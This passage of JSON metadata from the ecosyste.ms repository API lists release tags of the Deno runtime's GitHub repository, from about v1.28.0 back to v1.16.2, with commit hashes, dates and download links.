/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e7